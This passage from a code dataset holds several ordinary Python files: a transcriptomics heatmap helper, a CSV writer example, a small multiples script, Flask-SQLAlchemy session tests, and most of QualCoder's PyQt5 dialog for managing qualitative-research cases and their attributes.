'.xlsx'\n if data_files.count(name1) == 1:\n tr_data = pd.read_excel(wd_data + name1, index_col=1)\n elif data_files.count(name2) == 1:\n tr_data = pd.read_excel(wd_data + name2, index_col=1)\n else:\n tr_data = None\n print('Error !!!!!!!!!!!!! 
no file found for', s2, 'vs', s1)\n tr_data.columns = [c.replace(' ','').replace('[','').replace(']','').replace('FPKM','') \n for c in tr_data.columns]\n count = 0\n for locus in loci:\n if tr_data.q_value.loc[locus] <= 0.05:\n if tr_data[s2].loc[locus] > tr_data[s1].loc[locus]:\n count += 1\n elif tr_data[s2].loc[locus] < tr_data[s1].loc[locus]:\n count -= 1\n df_comp.set_value(s1, s2, count/len(loci))\n\n for s2 in scen:\n if s2.split('_')[1] == 'T1':\n s1 = s2.split('_')[0] + '_T2'\n else:\n s1 = s2.split('_')[0] + '_T1'\n name1 = 'Isoforms_Diff_Samples_' + s2 + '_vs_' + s1 + '.xlsx'\n name2 = 'Isoforms_Diff_Samples_' + s1 + '_vs_' + s2 + '.xlsx'\n if data_files.count(name1) == 1:\n tr_data = pd.read_excel(wd_data + name1, index_col=1)\n elif data_files.count(name2) == 1:\n tr_data = pd.read_excel(wd_data + name2, index_col=1)\n else:\n tr_data = None\n print('Error !!!!!!!!!!!!! no file found for', s2, 'vs', s1)\n tr_data.columns = [c.replace(' ','').replace('[','').replace(']','') for c in tr_data.columns]\n count = 0.0\n for locus in loci:\n if tr_data.q_value.loc[locus] <= 0.05:\n if tr_data[s2].loc[locus] > tr_data[s1].loc[locus]:\n count += 1\n elif tr_data[s2].loc[locus] < tr_data[s1].loc[locus]:\n count -= 1\n df_comp.set_value('time', s2, count/len(loci))\n if plot:\n fig = plt.figure(figsize=(5,5))\n sns.heatmap(df_comp, cmap='coolwarm', annot=True, linewidth=2, cbar=False, center=0)\n if title_plot is None:\n plt.title('Comparison Transcriptomics')\n else:\n plt.title(title_plot)\n return fig\n else:\n return df_comp","sub_path":"ipynb/funcs_transcripto.py","file_name":"funcs_transcripto.py","file_ext":"py","file_size_in_byte":5229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"396382564","text":"from csv import writer,DictWriter\n\nwith open(\"5_file0.csv\", 'w', newline = \"\") as f:\n # csv_writer = writer(f)\n # print(csv_writer)\n # csv_writer.writerow(['Name','age'])\n # csv_writer.writerow([\"Bhaumik\",24])\n\n # csv_writer.writerows([['Hemil',21], ['Arth',16]])\n\n csv_file = DictWriter(f, fieldnames = [\"name\", \"age\"])\n\n csv_file.writeheader()\n csv_file.writerow({\"name\": \"Bhaumik\", \"age\": 24})\n\n csv_file.writerows([\n {'name': 'Hemil', 'age': 21},\n {'name': 'Arth', 'age': 16}\n ])\n","sub_path":"Python/begining programs/folder2/5_csv_writer.py","file_name":"5_csv_writer.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"388099966","text":"import sys\n\nfor line in (l.strip() for l in open(sys.argv[1])):\n if line:\n x, n = (int(x) for x in line.split(','))\n\n multiplier = 1\n while n * multiplier < x:\n multiplier += 1\n\n print(n * multiplier)\n","sub_path":"easy/18_multiples_of_a_number.py","file_name":"18_multiples_of_a_number.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"175205107","text":"import random\n\nimport sqlalchemy as sa\nfrom sqlalchemy.orm import sessionmaker\n\nfrom flask_sqlalchemy import SQLAlchemy\n\n\ndef test_default_session_scoping(app, db):\n class FOOBar(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n\n db.create_all()\n\n with app.test_request_context():\n fb = FOOBar()\n db.session.add(fb)\n assert fb in db.session\n\n\ndef test_session_scoping_changing(app):\n db = SQLAlchemy(app, session_options={\"scopefunc\": random.random})\n\n class Example(db.Model):\n 
id = db.Column(db.Integer, primary_key=True)\n\n db.create_all()\n fb = Example()\n db.session.add(fb)\n assert fb not in db.session # because a new scope is generated on each call\n\n\ndef test_insert_update_delete(db):\n # Ensure _SignalTrackingMapperExtension doesn't croak when\n # faced with a vanilla SQLAlchemy session. Verify that\n # \"AttributeError: 'SessionMaker' object has no attribute\n # '_model_changes'\" is not thrown.\n Session = sessionmaker(bind=db.engine)\n\n class QazWsx(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n x = db.Column(db.String, default=\"\")\n\n db.create_all()\n session = Session()\n session.add(QazWsx())\n session.flush() # issues an INSERT.\n session.expunge_all()\n qaz_wsx = session.query(QazWsx).first()\n assert qaz_wsx.x == \"\"\n qaz_wsx.x = \"test\"\n session.flush() # issues an UPDATE.\n session.expunge_all()\n qaz_wsx = session.query(QazWsx).first()\n assert qaz_wsx.x == \"test\"\n session.delete(qaz_wsx) # issues a DELETE.\n assert session.query(QazWsx).first() is None\n\n\ndef test_listen_to_session_event(db):\n sa.event.listen(db.session, \"after_commit\", lambda session: None)\n","sub_path":"tests/test_sessions.py","file_name":"test_sessions.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"78785641","text":"# -*- coding: utf-8 -*-\n\n'''\nCopyright (c) 2019 Colin Curtain\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n\nAuthor: Colin Curtain (ccbogel)\nhttps://github.com/ccbogel/QualCoder\n'''\n\nimport csv\nimport datetime\nimport logging\nimport os\nimport sys\nimport re\nimport traceback\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtCore import Qt\n\nfrom add_item_name import DialogAddItemName\nfrom confirm_delete import DialogConfirmDelete\nfrom GUI.ui_dialog_cases import Ui_Dialog_cases\nfrom GUI.ui_dialog_attribute_type import Ui_Dialog_attribute_type\nfrom GUI.ui_dialog_start_and_end_marks import Ui_Dialog_StartAndEndMarks\nfrom memo import DialogMemo\nfrom select_file import DialogSelectFile\nfrom view_av import DialogViewAV\nfrom view_image import DialogViewImage\n\n\npath = os.path.abspath(os.path.dirname(__file__))\nlogger = logging.getLogger(__name__)\n\n\ndef exception_handler(exception_type, value, tb_obj):\n \"\"\" Global exception handler useful in GUIs.\n tb_obj: exception.__traceback__ \"\"\"\n tb = '\\n'.join(traceback.format_tb(tb_obj))\n text = 'Traceback (most recent call last):\\n' + tb + '\\n' + exception_type.__name__ + ': ' + str(value)\n print(text)\n logger.error(_(\"Uncaught exception: \") + text)\n QtWidgets.QMessageBox.critical(None, _('Uncaught Exception'), text)\n\n\nclass DialogCases(QtWidgets.QDialog):\n ''' Create, edit and delete cases.\n Assign entire text files or portions of files to cases.\n Assign attributes to cases. '''\n\n NAME_COLUMN = 0 # also primary key\n MEMO_COLUMN = 1\n ID_COLUMN = 2\n app = None\n parent_textEdit = None\n source = []\n sourceText = \"\"\n cases = []\n case_text = []\n selected_case = None\n selected_file = None\n caseTextViewed = []\n attributes = []\n\n def __init__(self, app, parent_textEdit):\n\n sys.excepthook = exception_handler\n self.app = app\n self.parent_textEdit = parent_textEdit\n QtWidgets.QDialog.__init__(self)\n self.ui = Ui_Dialog_cases()\n self.ui.setupUi(self)\n font = 'font: ' + str(self.app.settings['fontsize']) + 'pt '\n font += '\"' + self.app.settings['font'] + '\";'\n self.setStyleSheet(font)\n self.load_cases_and_attributes()\n self.ui.pushButton_add.clicked.connect(self.add_case)\n self.ui.pushButton_delete.clicked.connect(self.delete_case)\n self.ui.tableWidget.itemChanged.connect(self.cell_modified)\n self.ui.tableWidget.cellClicked.connect(self.cell_selected)\n self.ui.pushButton_addfiles.clicked.connect(self.add_file_to_case)\n self.ui.pushButton_openfile.clicked.connect(self.select_file)\n self.ui.pushButton_add_attribute.clicked.connect(self.add_attribute)\n self.ui.pushButton_autoassign.clicked.connect(self.automark)\n self.ui.pushButton_view.clicked.connect(self.view)\n self.ui.pushButton_import_cases.clicked.connect(self.import_cases_and_attributes)\n self.ui.textBrowser.setText(\"\")\n self.ui.textBrowser.setAutoFillBackground(True)\n self.ui.textBrowser.setContextMenuPolicy(Qt.CustomContextMenu)\n self.ui.textBrowser.customContextMenuRequested.connect(self.textBrowser_menu)\n self.ui.textBrowser.setOpenLinks(False)\n self.ui.textBrowser.anchorClicked.connect(self.link_clicked)\n self.fill_tableWidget()\n self.ui.splitter.setSizes([1, 1, 0])\n\n def load_cases_and_attributes(self):\n \"\"\" Load case and attribute details from database. 
Display in tableWidget.\n \"\"\"\n\n self.source = []\n self.cases = []\n self.case_text = []\n\n cur = self.app.conn.cursor()\n cur.execute(\"select name, id, fulltext, mediapath, memo, owner, date from source\")\n result = cur.fetchall()\n for row in result:\n self.source.append({'name': row[0], 'id': row[1], 'fulltext': row[2],\n 'mediapath': row[3], 'memo': row[4], 'owner': row[5], 'date': row[6]})\n cur.execute(\"select name, memo, owner, date, caseid from cases\")\n result = cur.fetchall()\n for row in result:\n self.cases.append({'name': row[0], 'memo': row[1], 'owner': row[2], 'date': row[3],\n 'caseid': row[4]})\n cur.execute(\"select name from attribute_type where caseOrFile='case'\")\n attribute_names = cur.fetchall()\n self.headerLabels = [\"Name\", \"Memo\", \"Id\"]\n for i in attribute_names:\n self.headerLabels.append(i[0])\n sql = \"select attribute.name, value, id from attribute where attr_type='case'\"\n cur.execute(sql)\n result = cur.fetchall()\n self.attributes = []\n for row in result:\n self.attributes.append(row)\n\n def add_attribute(self):\n \"\"\" When add button pressed, opens the addItem dialog to get new attribute text.\n Then get the attribute type through a dialog.\n AddItem dialog checks for duplicate attribute name.\n New attribute is added to the model and database. \"\"\"\n\n cur = self.app.conn.cursor()\n cur.execute(\"select name from attribute_type where caseOrFile='case'\")\n result = cur.fetchall()\n attribute_names = []\n for a in result:\n attribute_names.append({'name': a[0]})\n check_names = attribute_names + [{'name': 'name'}, {'name':'memo'}, {'name':'caseid'}, {'name':'date'}]\n ui = DialogAddItemName(check_names, _(\"New attribute name\"))\n ui.exec_()\n name = ui.get_new_name()\n if name is None or name == \"\":\n return\n Dialog_type = QtWidgets.QDialog()\n ui = Ui_Dialog_attribute_type()\n ui.setupUi(Dialog_type)\n ok = Dialog_type.exec_()\n valuetype = \"character\"\n if ok and ui.radioButton_numeric.isChecked():\n valuetype = \"numeric\"\n # update attribute_type list and database\n now_date = str(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n cur.execute(\"insert into attribute_type (name,date,owner,memo,caseOrFile, valuetype) values(?,?,?,?,?,?)\"\n ,(name, now_date, self.app.settings['codername'], \"\", 'case', valuetype))\n self.app.conn.commit()\n sql = \"select caseid from cases\"\n cur.execute(sql)\n case_ids = cur.fetchall()\n for id_ in case_ids:\n sql = \"insert into attribute (name, value, id, attr_type, date, owner) values (?,?,?,?,?,?)\"\n cur.execute(sql, (name, \"\", id_[0], 'case', now_date, self.app.settings['codername']))\n self.app.conn.commit()\n self.load_cases_and_attributes()\n self.fill_tableWidget()\n self.parent_textEdit.append(_(\"Attribute added to cases: \") + name + \", \" + _(\"type: \") + valuetype)\n\n def textBrowser_menu(self, position):\n ''' Context menu for textBrowser. Mark, unmark, annotate, copy. 
'''\n\n menu = QtWidgets.QMenu()\n if self.ui.textBrowser.toPlainText() == \"\":\n return\n ActionItemMark = menu.addAction(_(\"Mark\"))\n ActionItemUnmark = menu.addAction(_(\"Unmark\"))\n ActionItemCopy = menu.addAction(\"Copy\")\n action = menu.exec_(self.ui.textBrowser.mapToGlobal(position))\n if action == ActionItemMark:\n self.mark()\n if action == ActionItemUnmark:\n self.unmark()\n if action == ActionItemCopy:\n self.copy_selected_text_to_clipboard()\n\n def copy_selected_text_to_clipboard(self):\n\n selectedText = self.ui.textBrowser.textCursor().selectedText()\n cb = QtWidgets.QApplication.clipboard()\n cb.clear(mode=cb.Clipboard)\n cb.setText(selectedText, mode=cb.Clipboard)\n\n def import_cases_and_attributes(self):\n \"\"\" Import from a csv file with the cases and any attributes.\n The csv file must have a header row which details the attribute names.\n The csv file must be comma delimited. The first column must have the case ids.\n The attribute types are calculated from the data.\n \"\"\"\n\n if self.cases != []:\n logger.warning(_(\"Cases have already been created.\"))\n filename = QtWidgets.QFileDialog.getOpenFileName(None, _('Select attributes file'),\n self.app.settings['directory'], \"(*.csv)\")[0]\n if filename == \"\":\n return\n if filename[-4:].lower() != \".csv\":\n msg = filename + \"\\n\" + _(\"is not a .csv file. File not imported\")\n QtWidgets.QMessageBox.warning(None, \"Warning\", msg)\n self.parent_textEdit.append(msg)\n return\n values = []\n with open(filename, 'r', newline='') as f:\n reader = csv.reader(f, delimiter=',', quoting=csv.QUOTE_MINIMAL)\n try:\n for row in reader:\n values.append(row)\n except csv.Error as e:\n logger.warning(('file %s, line %d: %s' % (filename, reader.line_num, e)))\n if len(values) <= 1:\n logger.info(_(\"Cannot import from csv, only one row in file\"))\n return\n now_date = str(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n header = values[0]\n values = values[1:]\n # insert cases\n cur = self.app.conn.cursor()\n for v in values:\n item = {'name': v[0], 'memo': \"\", 'owner': self.app.settings['codername'],\n 'date': now_date}\n try:\n cur.execute(\"insert into cases (name,memo,owner,date) values(?,?,?,?)\"\n ,(item['name'],item['memo'],item['owner'],item['date']))\n self.app.conn.commit()\n cur.execute(\"select last_insert_rowid()\")\n item['caseid'] = cur.fetchone()[0]\n self.cases.append(item)\n except Exception as e:\n logger.error(\"item:\" + str(item) + \", \" + str(e))\n # determine attribute type\n attribute_value_type = [\"character\"] * len(header)\n for col, att_name in enumerate(header):\n numeric = True\n for val in values:\n try:\n float(val[col])\n except ValueError:\n numeric = False\n if numeric:\n attribute_value_type[col] = \"numeric\"\n # insert attribute types\n for col, att_name in enumerate(header):\n if col > 0:\n try:\n cur.execute(\"insert into attribute_type (name,date,owner,memo, \\\n valueType, caseOrFile) values(?,?,?,?,?,?)\"\n , (att_name, now_date, self.app.settings['codername'], \"\",\n attribute_value_type[col], 'case'))\n self.app.conn.commit()\n except Exception as e:\n logger.error(_(\"attribute:\") + att_name + \", \" + str(e))\n # insert attributes\n sql = \"select name, caseid from cases\"\n cur.execute(sql)\n name_and_ids = cur.fetchall()\n for n_i in name_and_ids:\n for v in values:\n if n_i[0] == v[0]:\n for col in range(1, len(v)):\n sql = \"insert into attribute (name, value, id, attr_type, date, owner) values (?,?,?,?,?,?)\"\n cur.execute(sql, (header[col], v[col], 
n_i[1], 'case',\n now_date, self.app.settings['codername']))\n self.app.conn.commit()\n self.load_cases_and_attributes()\n self.fill_tableWidget()\n msg = _(\"Cases and attributes imported from: \") + filename\n self.parent_textEdit.append(msg)\n logger.info(msg)\n\n def add_case(self):\n \"\"\" When add case button pressed, open addItem dialog to get the ase name.\n AddItem dialog checks for duplicate case name.\n New case is added to the model and database.\n Attribute placeholders are assigned to the database for this new case. \"\"\"\n\n ui = DialogAddItemName(self.cases, _(\"Case\"))\n ui.exec_()\n newCaseText = ui.get_new_name()\n if newCaseText is None:\n return\n # update case list and database\n item = {'name': newCaseText, 'memo': \"\", 'owner': self.app.settings['codername'],\n 'date': datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")}\n cur = self.app.conn.cursor()\n cur.execute(\"insert into cases (name,memo,owner,date) values(?,?,?,?)\"\n ,(item['name'],item['memo'],item['owner'],item['date']))\n self.app.conn.commit()\n cur.execute(\"select last_insert_rowid()\")\n item['caseid'] = cur.fetchone()[0]\n # add placeholder attribute values\n cur.execute(\"select name, valuetype from attribute_type where caseOrFile='case'\")\n atts = cur.fetchall()\n for att in atts:\n cur.execute(\"insert into attribute(name,attr_type,value,id,date,owner) \\\n values (?,?,?,?,?,?)\",\n (att[0], \"case\", \"\", item['caseid'], item['date'], item['owner']))\n self.app.conn.commit()\n self.cases.append(item)\n self.fill_tableWidget()\n self.parent_textEdit.append(_(\"Case added: \") + item['name'])\n\n def delete_case(self):\n \"\"\" When delete button pressed, case is deleted from model and database. \"\"\"\n\n tableRows_to_delete = [] # for table widget ids\n caseNames_to_delete = \"\" # for confirmDelete Dialog\n ids_to_delete = [] # for ids for cases and db\n\n for itemWidget in self.ui.tableWidget.selectedItems():\n tableRows_to_delete.append(int(itemWidget.row()))\n ids_to_delete.append(int(self.ui.tableWidget.item(itemWidget.row(),\n self.ID_COLUMN).text()))\n caseNames_to_delete = caseNames_to_delete + \"\\n\" + str(self.ui.tableWidget.item(itemWidget.row(),\n self.NAME_COLUMN).text())\n #logger.debug(\"X:\"+ str(itemWidget.row()) + \" y:\"+str(itemWidget.column()) +\" \"+itemWidget.text() +\" id:\"+str(self.tableWidget_codes.item(itemWidget.row(),3).text()))\n tableRows_to_delete.sort(reverse=True)\n if len(caseNames_to_delete) == 0:\n return\n ui = DialogConfirmDelete(caseNames_to_delete)\n ok = ui.exec_()\n if not ok:\n return\n for id in ids_to_delete:\n for c in self.cases:\n if c['caseid'] == id:\n self.parent_textEdit.append(\"Case deleted: \" + c['name'])\n self.cases.remove(c)\n cur = self.app.conn.cursor()\n #logger.debug(str(id) + \" \"+ str(type(id)))\n cur.execute(\"delete from cases where caseid = ?\", [id])\n cur.execute(\"delete from case_text where caseid = ?\", [id])\n sql = \"delete from attribute where id=? and attr_type='case'\"\n cur.execute(sql, [id])\n self.app.conn.commit()\n self.fill_tableWidget()\n\n def cell_modified(self):\n \"\"\" If the case name has been changed in the table widget update the database. 
\"\"\"\n\n x = self.ui.tableWidget.currentRow()\n y = self.ui.tableWidget.currentColumn()\n if y == self.NAME_COLUMN: # update case name\n new_text = str(self.ui.tableWidget.item(x, y).text()).strip()\n # check that no other case name has this text and this is not empty\n update = True\n if new_text == \"\":\n update = False\n for c in self.cases:\n if c['name'] == new_text:\n update = False\n if update:\n cur = self.app.conn.cursor()\n cur.execute(\"update cases set name=? where caseid=?\", (new_text, self.cases[x]['caseid']))\n self.app.conn.commit()\n self.cases[x]['name'] = new_text\n else: # put the original text in the cell\n self.ui.tableWidget.item(x, y).setText(self.cases[x]['name'])\n if y > 2: # update attribute value\n value = str(self.ui.tableWidget.item(x, y).text()).strip()\n attribute_name = self.headerLabels[y]\n cur = self.app.conn.cursor()\n cur.execute(\"update attribute set value=? where id=? and name=? and attr_type='case'\",\n (value, self.cases[x]['caseid'], attribute_name))\n self.app.conn.commit()\n\n def cell_selected(self):\n \"\"\" Highlight case text if a file is selected.\n Indicate memo is present, update memo text, or delete memo by clearing text.\n \"\"\"\n\n x = self.ui.tableWidget.currentRow()\n y = self.ui.tableWidget.currentColumn()\n if x == -1:\n self.selected_case = None\n self.ui.textBrowser.clear()\n self.case_text = []\n return\n self.selected_case = self.cases[x]\n # clear case text viewed if the caseid has changed\n if self.caseTextViewed != [] and self.caseTextViewed[0]['caseid'] != self.selected_case['caseid']:\n self.caseTextViewed = []\n self.case_text = []\n self.ui.textBrowser.clear()\n self.unlight()\n #logger.debug(\"Selected case: \" + str(self.selected_case['id']) +\" \"+self.selected_case['name'])\n # get case_text for this file\n if self.selected_file is not None:\n #logger.debug(\"File Selected: \" + str(self.selected_file['id'])+\" \"+self.selected_file['file'])\n self.case_text = []\n cur = self.app.conn.cursor()\n cur.execute(\"select caseid, fid, pos0, pos1, owner, date, memo from case_text where fid = ? and caseid = ?\",\n [self.selected_file['id'], self.selected_case['caseid']])\n result = cur.fetchall()\n for row in result:\n self.case_text.append({'caseid': row[0], 'fid': row[1], 'pos0': row[2],\n 'pos1': row[3], 'owner': row[4], 'date': row[5], 'memo': row[6]})\n self.highlight()\n\n if y == self.MEMO_COLUMN:\n ui = DialogMemo(self.app, _(\"Memo for case \") + self.cases[x]['name'],\n self.cases[x]['memo'])\n ui.exec_()\n self.cases[x]['memo'] = ui.memo\n cur = self.app.conn.cursor()\n cur.execute('update cases set memo=? where caseid=?', (self.cases[x]['memo'], self.cases[x]['caseid']))\n self.app.conn.commit()\n if self.cases[x]['memo'] == \"\":\n self.ui.tableWidget.setItem(x, self.MEMO_COLUMN, QtWidgets.QTableWidgetItem())\n else:\n self.ui.tableWidget.setItem(x, self.MEMO_COLUMN, QtWidgets.QTableWidgetItem(_(\"Yes\")))\n\n def fill_tableWidget(self):\n \"\"\" Fill the table widget with case details. 
\"\"\"\n\n rows = self.ui.tableWidget.rowCount()\n for c in range(0, rows):\n self.ui.tableWidget.removeRow(0)\n\n self.ui.tableWidget.setColumnCount(len(self.headerLabels))\n self.ui.tableWidget.setHorizontalHeaderLabels(self.headerLabels)\n for row, c in enumerate(self.cases):\n self.ui.tableWidget.insertRow(row)\n self.ui.tableWidget.setItem(row, self.NAME_COLUMN,\n QtWidgets.QTableWidgetItem(c['name']))\n memotmp = c['memo']\n if memotmp is not None and memotmp != \"\":\n self.ui.tableWidget.setItem(row, self.MEMO_COLUMN,\n QtWidgets.QTableWidgetItem(_(\"Yes\")))\n cid = c['caseid']\n if cid is None:\n cid = \"\"\n self.ui.tableWidget.setItem(row, self.ID_COLUMN, QtWidgets.QTableWidgetItem(str(cid)))\n # add the attribute values\n for a in self.attributes:\n for col, header in enumerate(self.headerLabels):\n if cid == a[2] and a[0] == header:\n self.ui.tableWidget.setItem(row, col, QtWidgets.QTableWidgetItem(str(a[1])))\n self.ui.tableWidget.verticalHeader().setVisible(False)\n self.ui.tableWidget.resizeColumnsToContents()\n self.ui.tableWidget.resizeRowsToContents()\n self.ui.tableWidget.hideColumn(self.ID_COLUMN)\n if self.app.settings['showids'] == 'True':\n self.ui.tableWidget.showColumn(self.ID_COLUMN)\n\n def add_file_to_case(self):\n \"\"\" When select file button is pressed a dialog of filenames is presented to the user.\n The entire text of the selected file is then added to the selected case.\n \"\"\"\n\n x = self.ui.tableWidget.currentRow()\n if x == -1:\n QtWidgets.QMessageBox.warning(None, _('Warning'), _(\"No case was selected\"))\n return\n ui = DialogSelectFile(self.source,\n _(\"Select entire file for case: \") + self.cases[x]['name'], \"single\")\n ok = ui.exec_()\n if not ok:\n return\n casefile = ui.get_selected()\n #logger.debug(casefile)\n text_len = 0\n if casefile['fulltext'] is not None:\n text_len = len(casefile['fulltext'])\n newlink = {'caseid': self.cases[x]['caseid'], 'fid': casefile['id'], 'pos0': 0,\n 'pos1': text_len, 'owner': self.app.settings['codername'],\n 'date': datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"), 'memo': \"\"}\n\n cur = self.app.conn.cursor()\n # check for an existing duplicated liked file first\n cur.execute(\"select * from case_text where caseid = ? and fid=? and pos0=? and pos1=?\",\n (newlink['caseid'], newlink['fid'], newlink['pos0'], newlink['pos1']))\n result = cur.fetchall()\n if len(result) > 0:\n QtWidgets.QMessageBox.warning(None, _(\"Already Linked\"),\n _(\"This file has already been linked to this case\"))\n return\n cur.execute(\"insert into case_text (caseid, fid, pos0, pos1, owner, date, memo) values(?,?,?,?,?,?,?)\"\n ,(newlink['caseid'],newlink['fid'],newlink['pos0'],newlink['pos1'],\n newlink['owner'],newlink['date'], newlink['memo']))\n self.app.conn.commit()\n msg = casefile['name'] + _(\" added to case.\")\n QtWidgets.QMessageBox.information(None, _(\"File added to case\"), msg)\n self.parent_textEdit.append(msg)\n\n def select_file(self):\n \"\"\" When open file button is pressed a dialog of filenames is presented to the user.\n The selected file is then used to view and for assigning text portions to cases\n\n Start with clear selection to save confusion of loading file text and not having it\n highlighted for a currently selected case. 
\"\"\"\n\n self.ui.tableWidget.clearSelection()\n self.case_text = []\n ui = DialogSelectFile(self.source, _(\"Select file to view\"), \"single\")\n ok = ui.exec_()\n if not ok:\n return\n # selected_file is dictionary with id and name\n self.selected_file = ui.get_selected()\n if self.selected_file['fulltext'] is not None:\n chars = str(len(self.selected_file['fulltext']))\n self.ui.label_filename.setText(\"File: \" + self.selected_file['name'] + \" [chars: \" + chars + \"]\")\n self.ui.textBrowser.setText(self.selected_file['fulltext'])\n self.caseTextViewed = []\n self.unlight()\n self.highlight()\n else:\n self.ui.textBrowser.setText(\"\")\n ui = DialogViewImage(self.settings, self.selected_file)\n ui.exec_()\n memo = ui.ui.textEdit.toPlainText()\n if self.selected_file['memo'] != memo:\n self.selected_file['memo'] = memo\n cur = self.app.conn.cursor()\n cur.execute('update source set memo=? where id=?',\n (self.selected_file['memo'], self.selected_file['id']))\n self.app.conn.commit()\n\n def unlight(self):\n \"\"\" Remove all text highlighting from current file. \"\"\"\n\n if self.selected_file is None:\n return\n if self.selected_file['fulltext'] is None:\n return\n cursor = self.ui.textBrowser.textCursor()\n try:\n cursor.setPosition(0, QtGui.QTextCursor.MoveAnchor)\n cursor.setPosition(len(self.selected_file['fulltext']) - 1, QtGui.QTextCursor.KeepAnchor)\n cursor.setCharFormat(QtGui.QTextCharFormat())\n except Exception as e:\n logger.debug((str(e) + \"\\n unlight, text length\" +str(len(self.textBrowser.toPlainText()))))\n\n def highlight(self):\n \"\"\" Apply text highlighting to current file.\n Highlight text of selected case with red underlining.\n #format_.setForeground(QtGui.QColor(\"#990000\")) \"\"\"\n\n if self.selected_file is None:\n return\n if self.selected_file['fulltext'] is None:\n return\n format_ = QtGui.QTextCharFormat()\n cursor = self.ui.textBrowser.textCursor()\n for item in self.case_text:\n try:\n cursor.setPosition(int(item['pos0']), QtGui.QTextCursor.MoveAnchor)\n cursor.setPosition(int(item['pos1']), QtGui.QTextCursor.KeepAnchor)\n format_.setFontUnderline(True)\n format_.setUnderlineColor(QtCore.Qt.red)\n cursor.setCharFormat(format_)\n except:\n msg = \"highlight, text length \" + str(len(self.ui.textBrowser.toPlainText()))\n msg += \"\\npos0:\" + str(item['pos0']) + \", pos1:\" + str(item['pos1'])\n logger.debug(msg)\n\n def view(self):\n \"\"\" View all of the text associated with this case.\n Add links to open image files. \"\"\"\n\n row = self.ui.tableWidget.currentRow()\n if row == -1:\n return\n if self.selected_case is None:\n return\n self.selected_file = None\n self.ui.label_filename.setText(_(\"Viewing text of case: \") + str(self.cases[row]['name']))\n self.ui.textBrowser.clear()\n self.caseTextViewed = []\n cur = self.app.conn.cursor()\n cur.execute(\"select caseid, fid, pos0, pos1, owner, date, memo from case_text where caseid = ? 
order by fid, pos0\",\n [self.selected_case['caseid'],])\n result = cur.fetchall()\n for row in result:\n caseText = \"\"\n sourcename = \"\"\n mediapath = \"\"\n for src in self.source:\n if src['id'] == row[1] and src['fulltext'] is not None:\n caseText = src['fulltext'][int(row[2]):int(row[3])]\n sourcename = src['name']\n if src['id'] == row[1] and src['fulltext'] is None:\n sourcename = src['name']\n mediapath = src['mediapath']\n self.caseTextViewed.append({'caseid': row[0], 'fid': row[1], 'pos0': row[2],\n 'pos1': row[3], 'owner': row[4], 'date': row[5], 'memo': row[6],\n 'text': caseText, 'sourcename': sourcename, 'mediapath': mediapath})\n\n for c in self.caseTextViewed:\n if c['mediapath'] == '':\n self.ui.textBrowser.append(\"\" + \"File: \" + c['sourcename'] + \" Text: \" +\n str(int(c['pos0'])) + \":\" + str(int(c['pos1'])) + \"\")\n self.ui.textBrowser.append(c['text'])\n elif c['mediapath'][:8] == \"/images/\":\n self.ui.textBrowser.append(' Image: ' + c['sourcename'] + '')\n path = self.app.project_path + c['mediapath']\n url = QtCore.QUrl(path)\n document = self.ui.textBrowser.document()\n image = QtGui.QImageReader(path).read()\n document.addResource(QtGui.QTextDocument.ImageResource, url, QtCore.QVariant(image))\n cursor = self.ui.textBrowser.textCursor()\n image_format = QtGui.QTextImageFormat()\n scaler = 1.0\n scaler_w = 1.0\n scaler_h = 1.0\n if image.width() > 400:\n scaler_w = 400 / image.width()\n if image.height() > 400:\n scaler_h = 400 / image.height()\n if scaler_w < scaler_h:\n scaler = scaler_w\n else:\n scaler = scaler_h\n image_format.setWidth(image.width() * scaler)\n image_format.setHeight(image.height() * scaler)\n image_format.setName(url.toString())\n cursor.insertImage(image_format)\n self.ui.textBrowser.append(\"
\")\n else:\n self.ui.textBrowser.append('
' + _('A/V media: ') + c['sourcename'] + '
